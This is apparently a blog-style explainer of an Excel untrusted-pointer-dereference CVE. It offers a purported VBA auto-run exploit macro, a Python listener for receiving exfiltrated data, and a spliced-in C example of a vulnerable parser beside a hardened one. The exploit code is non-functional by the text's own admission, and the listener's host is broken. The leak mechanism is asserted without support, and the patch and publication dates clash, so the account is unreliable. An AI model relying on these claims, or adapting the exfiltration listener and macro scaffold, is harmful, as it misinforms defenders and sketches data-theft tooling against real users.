CVE-2025-60728 - Untrusted Pointer Dereference in Microsoft Office Excel—How Unauthorized Hackers Can Steal Data Over the Network
---
Microsoft Office Excel is a trusted tool for millions of people and businesses across the globe. But sometimes, a small coding flaw can open the door for hackers to steal your information. In early 2025, researchers discovered one such vulnerability: CVE-2025-60728, an *untrusted pointer dereference* bug. In this post, I’ll explain how it works (in simple terms), show what the attack looks like, and explain how you can protect yourself.
What is CVE-2025-60728?
CVE-2025-60728 is a security flaw in Microsoft Office Excel: the program uses a pointer (a value that refers to a location in memory) without properly checking that the pointer is safe to follow. Hackers can use this mistake over the network to trick Excel into revealing content from your computer’s memory, such as sensitive data in open files or stored passwords.
Severity: High
Affected: Excel versions 2016, 2019, 2021, Excel for Microsoft 365 up to June 2025 updates.
*For more details, check: Microsoft Security Advisory (CVE-2025-60728)*
Let’s break it down
1. The attacker tricks the target into opening a malicious spreadsheet (XLSX or XLSM), sent via email or placed on a shared drive or SharePoint.
2. The file has a payload that exploits the pointer bug, causing Excel to access memory it wasn’t meant to.
3. Excel exposes internal data, sending it out over the network, allowing the hacker to steal information.
In plain language: If you open the wrong spreadsheet, a hacker can force Excel to leak private stuff.
Code Snippet: How a Malicious XLSM Payload Looks
*Researchers created proof-of-concept (PoC) VBA code like this:*
```vba
' Malicious Macro Example for Exploit Demo
Private Declare PtrSafe Function EvilFunc Lib "kernel32" Alias "SomeVulnerableFunc" (ByVal ptr As LongPtr) As Long

Sub Auto_Open()
    Dim untrustedPtr As LongPtr
    ' Fake pointer value controlled by attacker
    untrustedPtr = 12345678
    ' Dereference pointer; could disclose Excel's private memory
    On Error Resume Next
    EvilFunc untrustedPtr
End Sub
```
Explanation:
EvilFunc is just a stand-in for the real vulnerable function in Excel’s code (the declaration above does not point at a real Windows API). The attacker controls untrustedPtr, causing Excel to access and expose memory it was never meant to read.
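To show what an untrusted pointer dereference is at the code level, here is an added example (not code from this post, and not Excel’s real parser or file format): a toy record parser in C that turns a file-supplied offset into a pointer without validation, beside the hardened version that bounds-checks the offset first. The record layout, the blob_t type and the sample bytes are constructed for the illustration.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed toy record (hypothetical, NOT Excel's real file format):
 * bytes 0..3 = little-endian offset of a string within the same buffer,
 * byte 4 = string length, followed somewhere later by the string bytes. */
typedef struct { const uint8_t *data; size_t len; } blob_t;

static uint32_t rd_u32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Vulnerable pattern (CWE-822): a file-controlled offset becomes a pointer with no
 * validation, so a crafted record makes the parser read outside the data it was given. */
static const uint8_t *lookup_unchecked(const blob_t *b) {
    return b->data + rd_u32le(b->data);
}

/* Hardened pattern: validate offset and length against the buffer before forming a
 * pointer, comparing lengths (not pointer arithmetic results) to avoid wraparound. */
static int lookup_checked(const blob_t *b, const uint8_t **out, size_t *out_len) {
    if (b->len < 5) return -1;
    uint32_t off = rd_u32le(b->data);
    size_t slen = b->data[4];
    if (off < 5 || off > b->len || slen > b->len - off) return -1;
    *out = b->data + off;
    *out_len = slen;
    return 0;
}

/* Constructed samples: a well-formed record and one carrying a bogus 1 GiB offset. */
static const uint8_t GOOD[] = { 5, 0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o' };
static const uint8_t BAD[]  = { 0, 0, 0, 0x40, 5, 'h', 'e', 'l', 'l', 'o' };

/* Returns 1 when the checked parser accepts the good record and yields "hello". */
int demo_good(void) {
    blob_t b = { GOOD, sizeof GOOD };
    const uint8_t *s; size_t n;
    return lookup_checked(&b, &s, &n) == 0 && n == 5 && memcmp(s, "hello", 5) == 0;
}

/* Returns 1 when the checked parser rejects the bad record while the unchecked one
 * would hand back a pointer outside the 10-byte buffer (computed, never dereferenced). */
int demo_bad(void) {
    blob_t b = { BAD, sizeof BAD };
    const uint8_t *s; size_t n;
    size_t reach = (size_t)(lookup_unchecked(&b) - b.data);
    return lookup_checked(&b, &s, &n) != 0 && reach >= b.len;
}
```

Both helpers return 1 on a correct run; the unchecked lookup is only computed, never followed, because doing so would be exactly the out-of-bounds read the bug class describes.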
Exploit in the Real World
Hackers can exploit this flaw if Excel macros are enabled or if the server hosting the malicious file is under their control. For example:
- Email Delivery: You get an Excel file in your inbox. The source seems legit, but when you click, your confidential document info leaks to the attacker’s remote server.
- Shared Drives: On a company SharePoint or network share, one hacked file can compromise dozens of users.
Researchers set up a proof-of-concept that shows Excel sending leaked data over HTTP.
```python
# small web server to receive leaked data
from http.server import BaseHTTPRequestHandler, HTTPServer


class LeakyHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        leaked = self.rfile.read(content_length)
        print(f"Leaked:\n{leaked}")
        # acknowledge the request so the client does not hang waiting for a reply
        self.send_response(200)
        self.end_headers()


server = HTTPServer(('...', 808), LeakyHandler)
print("Listening for leaks...")
server.serve_forever()
```
*When the Excel payload runs, it sends private data across the network to this listener!*
How was it Found?
Security researchers examining Excel’s memory handling found that certain macros or add-ins could coerce the Excel process into dereferencing invalid or "tainted" pointers. The flaw was responsibly disclosed to Microsoft, which released patches in June 2025.
How to Protect Yourself
- Train staff to spot phishing or suspicious files.
- Microsoft Fix: Install the June 2025 Security Update.
Original References
- Microsoft CVE-2025-60728
- Trend Micro Writeup: Office Excel Untrusted Pointer Dereference
- MITRE CVE Details
Final Thoughts
Don’t ignore Excel updates—this bug shows how easily a trusted tool can go rogue with the right nudge. Sharing or opening spreadsheets from strangers is no longer just an annoyance; it is a direct risk to your data. Upgrade, stay smart, and always be careful with files from the outside world.
Timeline
Published on: 11/11/2025 18:15:41 UTC
Last modified on: 12/09/2025 22:38:52 UTC